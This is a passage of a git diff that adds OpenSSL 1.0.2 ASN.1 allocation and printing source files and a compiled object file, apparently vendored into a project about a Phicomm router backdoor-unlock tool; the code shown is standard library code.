+    case ASN1_ITYPE_PRIMITIVE:
+        if (it->templates) {
+            if (!ASN1_template_new(pval, it->templates))
+                goto memerr;
+        } else if (!ASN1_primitive_new(pval, it))
+            goto memerr;
+        break;
+
+    case ASN1_ITYPE_MSTRING:
+        if (!ASN1_primitive_new(pval, it))
+            goto memerr;
+        break;
+
+    case ASN1_ITYPE_CHOICE:
+        if (asn1_cb) {
+            i = asn1_cb(ASN1_OP_NEW_PRE, pval, it, NULL);
+            if (!i)
+                goto auxerr;
+            if (i == 2) {
+#ifdef CRYPTO_MDEBUG
+                if (it->sname)
+                    CRYPTO_pop_info();
+#endif
+                return 1;
+            }
+        }
+        if (!combine) {
+            *pval = OPENSSL_malloc(it->size);
+            if (!*pval)
+                goto memerr;
+            memset(*pval, 0, it->size);
+        }
+        asn1_set_choice_selector(pval, -1, it);
+        if (asn1_cb && !asn1_cb(ASN1_OP_NEW_POST, pval, it, NULL))
+            goto auxerr;
+        break;
+
+    case ASN1_ITYPE_NDEF_SEQUENCE:
+    case ASN1_ITYPE_SEQUENCE:
+        if (asn1_cb) {
+            i = asn1_cb(ASN1_OP_NEW_PRE, pval, it, NULL);
+            if (!i)
+                goto auxerr;
+            if (i == 2) {
+#ifdef CRYPTO_MDEBUG
+                if (it->sname)
+                    CRYPTO_pop_info();
+#endif
+                return 1;
+            }
+        }
+        if (!combine) {
+            *pval = OPENSSL_malloc(it->size);
+            if (!*pval)
+                goto memerr;
+            memset(*pval, 0, it->size);
+            asn1_do_lock(pval, 0, it);
+            asn1_enc_init(pval, it);
+        }
+        for (i = 0, tt = it->templates; i < it->tcount; tt++, i++) {
+            pseqval = asn1_get_field_ptr(pval, tt);
+            if (!ASN1_template_new(pseqval, tt))
+                goto memerr;
+        }
+        if (asn1_cb && !asn1_cb(ASN1_OP_NEW_POST, pval, it, NULL))
+            goto auxerr;
+        break;
+    }
+#ifdef CRYPTO_MDEBUG
+    if (it->sname)
+        CRYPTO_pop_info();
+#endif
+    return 1;
+
+ memerr:
+    ASN1err(ASN1_F_ASN1_ITEM_EX_COMBINE_NEW, ERR_R_MALLOC_FAILURE);
+#ifdef CRYPTO_MDEBUG
+    if (it->sname)
+        CRYPTO_pop_info();
+#endif
+    return 0;
+
+ auxerr:
+    ASN1err(ASN1_F_ASN1_ITEM_EX_COMBINE_NEW, ASN1_R_AUX_ERROR);
+    ASN1_item_ex_free(pval, it);
+#ifdef CRYPTO_MDEBUG
+    if (it->sname)
+        CRYPTO_pop_info();
+#endif
+    return 0;
+
+}
+
+static void asn1_item_clear(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    const ASN1_EXTERN_FUNCS *ef;
+
+    switch (it->itype) {
+
+    case ASN1_ITYPE_EXTERN:
+        ef = it->funcs;
+        if (ef && ef->asn1_ex_clear)
+            ef->asn1_ex_clear(pval, it);
+        else
+            *pval = NULL;
+        break;
+
+    case ASN1_ITYPE_PRIMITIVE:
+        if (it->templates)
+            asn1_template_clear(pval, it->templates);
+        else
+            asn1_primitive_clear(pval, it);
+        break;
+
+    case ASN1_ITYPE_MSTRING:
+        asn1_primitive_clear(pval, it);
+        break;
+
+    case ASN1_ITYPE_COMPAT:
+    case ASN1_ITYPE_CHOICE:
+    case ASN1_ITYPE_SEQUENCE:
+    case ASN1_ITYPE_NDEF_SEQUENCE:
+        *pval = NULL;
+        break;
+    }
+}
+
+int ASN1_template_new(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt)
+{
+    const ASN1_ITEM *it = ASN1_ITEM_ptr(tt->item);
+    int ret;
+    if (tt->flags & ASN1_TFLG_OPTIONAL) {
+        asn1_template_clear(pval, tt);
+        return 1;
+    }
+    /* If ANY DEFINED BY nothing to do */
+
+    if (tt->flags & ASN1_TFLG_ADB_MASK) {
+        *pval = NULL;
+        return 1;
+    }
+#ifdef CRYPTO_MDEBUG
+    if (tt->field_name)
+        CRYPTO_push_info(tt->field_name);
+#endif
+    /* If SET OF or SEQUENCE OF, its a STACK */
+    if (tt->flags & ASN1_TFLG_SK_MASK) {
+        STACK_OF(ASN1_VALUE) *skval;
+        skval = sk_ASN1_VALUE_new_null();
+        if (!skval) {
+            ASN1err(ASN1_F_ASN1_TEMPLATE_NEW, ERR_R_MALLOC_FAILURE);
+            ret = 0;
+            goto done;
+        }
+        *pval = (ASN1_VALUE *)skval;
+        ret = 1;
+        goto done;
+    }
+    /* Otherwise pass it back to the item routine */
+    ret = asn1_item_ex_combine_new(pval, it, tt->flags & ASN1_TFLG_COMBINE);
+ done:
+#ifdef CRYPTO_MDEBUG
+    if (it->sname)
+        CRYPTO_pop_info();
+#endif
+    return ret;
+}
+
+static void asn1_template_clear(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt)
+{
+    /* If ADB or STACK just NULL the field */
+    if (tt->flags & (ASN1_TFLG_ADB_MASK | ASN1_TFLG_SK_MASK))
+        *pval = NULL;
+    else
+        asn1_item_clear(pval, ASN1_ITEM_ptr(tt->item));
+}
+
+/*
+ * NB: could probably combine most of the real XXX_new() behaviour and junk
+ * all the old functions.
+ */
+
+int ASN1_primitive_new(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    ASN1_TYPE *typ;
+    ASN1_STRING *str;
+    int utype;
+
+    if (it && it->funcs) {
+        const ASN1_PRIMITIVE_FUNCS *pf = it->funcs;
+        if (pf->prim_new)
+            return pf->prim_new(pval, it);
+    }
+
+    if (!it || (it->itype == ASN1_ITYPE_MSTRING))
+        utype = -1;
+    else
+        utype = it->utype;
+    switch (utype) {
+    case V_ASN1_OBJECT:
+        *pval = (ASN1_VALUE *)OBJ_nid2obj(NID_undef);
+        return 1;
+
+    case V_ASN1_BOOLEAN:
+        *(ASN1_BOOLEAN *)pval = it->size;
+        return 1;
+
+    case V_ASN1_NULL:
+        *pval = (ASN1_VALUE *)1;
+        return 1;
+
+    case V_ASN1_ANY:
+        typ = OPENSSL_malloc(sizeof(ASN1_TYPE));
+        if (!typ)
+            return 0;
+        typ->value.ptr = NULL;
+        typ->type = -1;
+        *pval = (ASN1_VALUE *)typ;
+        break;
+
+    default:
+        str = ASN1_STRING_type_new(utype);
+        if (it->itype == ASN1_ITYPE_MSTRING && str)
+            str->flags |= ASN1_STRING_FLAG_MSTRING;
+        *pval = (ASN1_VALUE *)str;
+        break;
+    }
+    if (*pval)
+        return 1;
+    return 0;
+}
+
+static void asn1_primitive_clear(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    int utype;
+    if (it && it->funcs) {
+        const ASN1_PRIMITIVE_FUNCS *pf = it->funcs;
+        if (pf->prim_clear)
+            pf->prim_clear(pval, it);
+        else
+            *pval = NULL;
+        return;
+    }
+    if (!it || (it->itype == ASN1_ITYPE_MSTRING))
+        utype = -1;
+    else
+        utype = it->utype;
+    if (utype == V_ASN1_BOOLEAN)
+        *(ASN1_BOOLEAN *)pval = it->size;
+    else
+        *pval = NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_new.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_new.o
new file mode 100644
index 0000000000000000000000000000000000000000..b643203440c8f7b7eeee34f4a1db390179d7fc69
GIT binary patch
literal 4944
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
b6Ib;Eu7bIy{BF@o|6LLPkI|SyZvFoQu#JQ4

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_prn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_prn.c
new file mode 100644
index 0000000..11d784c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_prn.c
@@ -0,0 +1,582 @@
+/* tasn_prn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000,2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/objects.h>
+#include <openssl/buffer.h>
+#include <openssl/err.h>
+#include <openssl/x509v3.h>
+#include "asn1_locl.h"
+
+/*
+ * Print routines.
+ */
+
+/* ASN1_PCTX routines */
+
+ASN1_PCTX default_pctx = {
+    ASN1_PCTX_FLAGS_SHOW_ABSENT, /* flags */
+    0,                          /* nm_flags */
+    0,                          /* cert_flags */
+    0,                          /* oid_flags */
+    0                           /* str_flags */
+};
+
+ASN1_PCTX *ASN1_PCTX_new(void)
+{
+    ASN1_PCTX *ret;
+    ret = OPENSSL_malloc(sizeof(ASN1_PCTX));
+    if (ret == NULL) {
+        ASN1err(ASN1_F_ASN1_PCTX_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    ret->flags = 0;
+    ret->nm_flags = 0;
+    ret->cert_flags = 0;
+    ret->oid_flags = 0;
+    ret->str_flags = 0;
+    return ret;
+}
+
+void ASN1_PCTX_free(ASN1_PCTX *p)
+{
+    OPENSSL_free(p);
+}
+
+unsigned long ASN1_PCTX_get_flags(ASN1_PCTX *p)
+{
+    return p->flags;
+}
+
+void ASN1_PCTX_set_flags(ASN1_PCTX *p, unsigned long flags)
+{
+    p->flags = flags;
+}
+
+unsigned long ASN1_PCTX_get_nm_flags(ASN1_PCTX *p)
+{
+    return p->nm_flags;
+}
+
+void ASN1_PCTX_set_nm_flags(ASN1_PCTX *p, unsigned long flags)
+{
+    p->nm_flags = flags;
+}
+
+unsigned long ASN1_PCTX_get_cert_flags(ASN1_PCTX *p)
+{
+    return p->cert_flags;
+}
+
+void ASN1_PCTX_set_cert_flags(ASN1_PCTX *p, unsigned long flags)
+{
+    p->cert_flags = flags;
+}
+
+unsigned long ASN1_PCTX_get_oid_flags(ASN1_PCTX *p)
+{
+    return p->oid_flags;
+}
+
+void ASN1_PCTX_set_oid_flags(ASN1_PCTX *p, unsigned long flags)
+{
+    p->oid_flags = flags;
+}
+
+unsigned long ASN1_PCTX_get_str_flags(ASN1_PCTX *p)
+{
+    return p->str_flags;
+}
+
+void ASN1_PCTX_set_str_flags(ASN1_PCTX *p, unsigned long flags)
+{
+    p->str_flags = flags;
+}
+
+/* Main print routines */
+
+static int asn1_item_print_ctx(BIO *out, ASN1_VALUE **fld, int indent,
+                               const ASN1_ITEM *it,
+                               const char *fname, const char *sname,
+                               int nohdr, const ASN1_PCTX *pctx);
+
+int asn1_template_print_ctx(BIO *out, ASN1_VALUE **fld, int indent,
+                            const ASN1_TEMPLATE *tt, const ASN1_PCTX *pctx);
+
+static int asn1_primitive_print(BIO *out, ASN1_VALUE **fld,
+                                const ASN1_ITEM *it, int indent,
+                                const char *fname, const char *sname,
+                                const ASN1_PCTX *pctx);
+
+static int asn1_print_fsname(BIO *out, int indent,
+                             const char *fname, const char *sname,
+                             const ASN1_PCTX *pctx);
+
+int ASN1_item_print(BIO *out, ASN1_VALUE *ifld, int indent,
+                    const ASN1_ITEM *it, const ASN1_PCTX *pctx)
+{
+    const char *sname;
+    if (pctx == NULL)
+        pctx = &default_pctx;
+    if (pctx->flags & ASN1_PCTX_FLAGS_NO_STRUCT_NAME)
+        sname = NULL;
+    else
+        sname = it->sname;
+    return asn1_item_print_ctx(out, &ifld, indent, it, NULL, sname, 0, pctx);
+}
+
+static int asn1_item_print_ctx(BIO *out, ASN1_VALUE **fld, int indent,
+                               const ASN1_ITEM *it,
+                               const char *fname, const char *sname,
+                               int nohdr, const ASN1_PCTX *pctx)
+{
+    const ASN1_TEMPLATE *tt;
+    const ASN1_EXTERN_FUNCS *ef;
+    ASN1_VALUE **tmpfld;
+    const ASN1_AUX *aux = it->funcs;
+    ASN1_aux_cb *asn1_cb;
+    ASN1_PRINT_ARG parg;
+    int i;
+    if (aux && aux->asn1_cb) {
+        parg.out = out;
+        parg.indent = indent;
+        parg.pctx = pctx;
+        asn1_cb = aux->asn1_cb;
+    } else
+        asn1_cb = 0;
+
+    if (*fld == NULL) {
+        if (pctx->flags & ASN1_PCTX_FLAGS_SHOW_ABSENT) {
+            if (!nohdr && !asn1_print_fsname(out, indent, fname, sname, pctx))
+                return 0;
+            if (BIO_puts(out, "<ABSENT>\n") <= 0)
+                return 0;
+        }
+        return 1;
+    }
+
+    switch (it->itype) {
+    case ASN1_ITYPE_PRIMITIVE:
+        if (it->templates) {
+            if (!asn1_template_print_ctx(out, fld, indent,
+                                         it->templates, pctx))
+                return 0;
+        }
+        /* fall thru */
+    case ASN1_ITYPE_MSTRING:
+        if (!asn1_primitive_print(out, fld, it, indent, fname, sname, pctx))
+            return 0;
+        break;
+
+    case ASN1_ITYPE_EXTERN:
+        if (!nohdr && !asn1_print_fsname(out, indent, fname, sname, pctx))
+            return 0;
+        /* Use new style print routine if possible */
+        ef = it->funcs;
+        if (ef && ef->asn1_ex_print) {
+            i = ef->asn1_ex_print(out, fld, indent, "", pctx);
+            if (!i)
+                return 0;
+            if ((i == 2) && (BIO_puts(out, "\n") <= 0))
+                return 0;
+            return 1;
+        } else if (sname &&
+                   BIO_printf(out, ":EXTERNAL TYPE %s\n", sname) <= 0)
+            return 0;
+        break;
+
+    case ASN1_ITYPE_CHOICE:
+#if 0
+        if (!nohdr && !asn1_print_fsname(out, indent, fname, sname, pctx))
+            return 0;
+#endif
+        /* CHOICE type, get selector */
+        i = asn1_get_choice_selector(fld, it);
+        /* This should never happen... */
+        if ((i < 0) || (i >= it->tcount)) {
+            if (BIO_printf(out, "ERROR: selector [%d] invalid\n", i) <= 0)
+                return 0;
+            return 1;
+        }
+        tt = it->templates + i;
+        tmpfld = asn1_get_field_ptr(fld, tt);
+        if (!asn1_template_print_ctx(out, tmpfld, indent, tt, pctx))
+            return 0;
+        break;
+
+    case ASN1_ITYPE_SEQUENCE:
+    case ASN1_ITYPE_NDEF_SEQUENCE:
+        if (!nohdr && !asn1_print_fsname(out, indent, fname, sname, pctx))
+            return 0;
+        if (fname || sname) {
+            if (pctx->flags & ASN1_PCTX_FLAGS_SHOW_SEQUENCE) {
+                if (BIO_puts(out, " {\n") <= 0)
+                    return 0;
+            } else {
+                if (BIO_puts(out, "\n") <= 0)
+                    return 0;
+            }
+        }
+
+        if (asn1_cb) {
+            i = asn1_cb(ASN1_OP_PRINT_PRE, fld, it, &parg);
+            if (i == 0)
+                return 0;
+            if (i == 2)
+                return 1;
+        }
+
+        /* Print each field entry */
+        for (i = 0, tt = it->templates; i < it->tcount; i++, tt++) {
+            const ASN1_TEMPLATE *seqtt;
+            seqtt = asn1_do_adb(fld, tt, 1);
+            tmpfld = asn1_get_field_ptr(fld, seqtt);
+            if (!asn1_template_print_ctx(out, tmpfld,
+                                         indent + 2, seqtt, pctx))
+                return 0;
+        }
+        if (pctx->flags & ASN1_PCTX_FLAGS_SHOW_SEQUENCE) {
+            if (BIO_printf(out, "%*s}\n", indent, "") < 0)
+                return 0;
+        }
+
+        if (asn1_cb) {
+            i = asn1_cb(ASN1_OP_PRINT_POST, fld, it, &parg);
+            if (i == 0)
+                return 0;
+        }
+        break;
+
+    default:
+        BIO_printf(out, "Unprocessed type %d\n", it->itype);
+        return 0;
+    }
+
+    return 1;
+}
+
+int asn1_template_print_ctx(BIO *out, ASN1_VALUE **fld, int indent,
+                            const ASN1_TEMPLATE *tt, const ASN1_PCTX *pctx)
+{
+    int i, flags;
+    const char *sname, *fname;
+    flags = tt->flags;
+    if (pctx->flags & ASN1_PCTX_FLAGS_SHOW_FIELD_STRUCT_NAME)
+        sname = ASN1_ITEM_ptr(tt->item)->sname;
+    else
+        sname = NULL;
+    if (pctx->flags & ASN1_PCTX_FLAGS_NO_FIELD_NAME)
+        fname = NULL;
+    else
+        fname = tt->field_name;
+    if (flags & ASN1_TFLG_SK_MASK) {
+        char *tname;
+        ASN1_VALUE *skitem;
+        STACK_OF(ASN1_VALUE) *stack;
+
+        /* SET OF, SEQUENCE OF */
+        if (fname) {
+            if (pctx->flags & ASN1_PCTX_FLAGS_SHOW_SSOF) {
+                if (flags & ASN1_TFLG_SET_OF)
+                    tname = "SET";
+                else
+                    tname = "SEQUENCE";
+                if (BIO_printf(out, "%*s%s OF %s {\n",
+                               indent, "", tname, tt->field_name) <= 0)
+                    return 0;
+            } else if (BIO_printf(out, "%*s%s:\n", indent, "", fname) <= 0)
+                return 0;
+        }
+        stack = (STACK_OF(ASN1_VALUE) *)*fld;
+        for (i = 0; i < sk_ASN1_VALUE_num(stack); i++) {
+            if ((i > 0) && (BIO_puts(out, "\n") <= 0))
+                return 0;
+
+            skitem = sk_ASN1_VALUE_value(stack, i);
+            if (!asn1_item_print_ctx(out, &skitem, indent + 2,
+                                     ASN1_ITEM_ptr(tt->item), NULL, NULL, 1,
+                                     pctx))
+                return 0;
+        }
+        if (!i && BIO_printf(out, "%*s<EMPTY>\n", indent + 2, "") <= 0)
+            return 0;
+        if (pctx->flags & ASN1_PCTX_FLAGS_SHOW_SEQUENCE) {
+            if (BIO_printf(out, "%*s}\n", indent, "") <= 0)
+                return 0;
+        }
+        return 1;
+    }
+    return asn1_item_print_ctx(out, fld, indent, ASN1_ITEM_ptr(tt->item),
+                               fname, sname, 0, pctx);
+}
+
+static int asn1_print_fsname(BIO *out, int indent,
+                             const char *fname, const char *sname,
+                             const ASN1_PCTX *pctx)
+{
+    static char spaces[] = "                    ";
+    const int nspaces = sizeof(spaces) - 1;
+
+#if 0
+    if (!sname && !fname)
+        return 1;
+#endif
+
+    while (indent > nspaces) {
+        if (BIO_write(out, spaces, nspaces) != nspaces)
+            return 0;
+        indent -= nspaces;
+    }
+    if (BIO_write(out, spaces, indent) != indent)
+        return 0;
+    if (pctx->flags & ASN1_PCTX_FLAGS_NO_STRUCT_NAME)
+        sname = NULL;
+    if (pctx->flags & ASN1_PCTX_FLAGS_NO_FIELD_NAME)
+        fname = NULL;
+    if (!sname && !fname)
+        return 1;
+    if (fname) {
+        if (BIO_puts(out, fname) <= 0)
+            return 0;
+    }
+    if (sname) {
+        if (fname) {
+            if (BIO_printf(out, " (%s)", sname) <= 0)
+                return 0;
+        } else {
+            if (BIO_puts(out, sname) <= 0)
+                return 0;
+        }
+    }
+    if (BIO_write(out, ": ", 2) != 2)
+        return 0;
+    return 1;
+}
+
+static int asn1_print_boolean_ctx(BIO *out, int boolval,
+                                  const ASN1_PCTX *pctx)
+{
+    const char *str;
+    switch (boolval) {
+    case -1:
+        str = "BOOL ABSENT";
+        break;
+
+    case 0:
+        str = "FALSE";
+        break;
+
+    default:
+        str = "TRUE";
+        break;
+
+    }
+
+    if (BIO_puts(out, str) <= 0)
+        return 0;
+    return 1;
+
+}
+
+static int asn1_print_integer_ctx(BIO *out, ASN1_INTEGER *str,
+                                  const ASN1_PCTX *pctx)
+{
+    char *s;
+    int ret = 1;
+    s = i2s_ASN1_INTEGER(NULL, str);
+    if (BIO_puts(out, s) <= 0)
+        ret = 0;
+    OPENSSL_free(s);
+    return ret;
+}
+
+static int asn1_print_oid_ctx(BIO *out, const ASN1_OBJECT *oid,
+                              const ASN1_PCTX *pctx)
+{
+    char objbuf[80];
+    const char *ln;
+    ln = OBJ_nid2ln(OBJ_obj2nid(oid));
+    if (!ln)
+        ln = "";
+    OBJ_obj2txt(objbuf, sizeof objbuf, oid, 1);
+    if (BIO_printf(out, "%s (%s)", ln, objbuf) <= 0)
+        return 0;
+    return 1;
+}
+
+static int asn1_print_obstring_ctx(BIO *out, ASN1_STRING *str, int indent,
+                                   const ASN1_PCTX *pctx)
+{
+    if (str->type == V_ASN1_BIT_STRING) {
+        if (BIO_printf(out, " (%ld unused bits)\n", str->flags & 0x7) <= 0)
+            return 0;
+    } else if (BIO_puts(out, "\n") <= 0)
+        return 0;
+    if ((str->length > 0)
+        && BIO_dump_indent(out, (char *)str->data, str->length,
+                           indent + 2) <= 0)
+        return 0;
+    return 1;
+}
+
+static int asn1_primitive_print(BIO *out, ASN1_VALUE **fld,
+                                const ASN1_ITEM *it, int indent,
+                                const char *fname, const char *sname,
+                                const ASN1_PCTX *pctx)
+{
+    long utype;
+    ASN1_STRING *str;
+    int ret = 1, needlf = 1;
+    const char *pname;
+    const ASN1_PRIMITIVE_FUNCS *pf;
+    pf = it->funcs;
+    if (!asn1_print_fsname(out, indent, fname, sname, pctx))
+        return 0;
+    if (pf && pf->prim_print)
+        return pf->prim_print(out, fld, it, indent, pctx);
+    str = (ASN1_STRING *)*fld;
+    if (it->itype == ASN1_ITYPE_MSTRING)
+        utype = str->type & ~V_ASN1_NEG;
+    else
+        utype = it->utype;
+    if (utype == V_ASN1_ANY) {
+        ASN1_TYPE *atype = (ASN1_TYPE *)*fld;
+        utype = atype->type;
+        fld = &atype->value.asn1_value;
+        str = (ASN1_STRING *)*fld;
+        if (pctx->flags & ASN1_PCTX_FLAGS_NO_ANY_TYPE)
+            pname = NULL;
+        else
+            pname = ASN1_tag2str(utype);
+    } else {
+        if (pctx->flags & ASN1_PCTX_FLAGS_SHOW_TYPE)
+            pname = ASN1_tag2str(utype);
+        else
+            pname = NULL;
+    }
+
+    if (utype == V_ASN1_NULL) {
+        if (BIO_puts(out, "NULL\n") <= 0)
+            return 0;
+        return 1;
+    }
+
+    if (pname) {
+        if (BIO_puts(out, pname) <= 0)
+            return 0;
+        if (BIO_puts(out, ":") <= 0)
+            return 0;
+    }
+
+    switch (utype) {
+    case V_ASN1_BOOLEAN:
+        {
+            int boolval = *(int *)fld;
+            if (boolval == -1)
+                boolval = it->size;
+            ret = asn1_print_boolean_ctx(out, boolval, pctx);
+        }
+        break;
+
+    case V_ASN1_INTEGER:
+    case V_ASN1_ENUMERATED:
+        ret = asn1_print_integer_ctx(out, str, pctx);
+        break;
+
+    case V_ASN1_UTCTIME:
+        ret = ASN1_UTCTIME_print(out, str);
+        break;
+
+    case V_ASN1_GENERALIZEDTIME:
+        ret = ASN1_GENERALIZEDTIME_print(out, str);
+        break;
+
+    case V_ASN1_OBJECT:
+        ret = asn1_print_oid_ctx(out, (const ASN1_OBJECT *)*fld, pctx);
+        break;
+
+    case V_ASN1_OCTET_STRING:
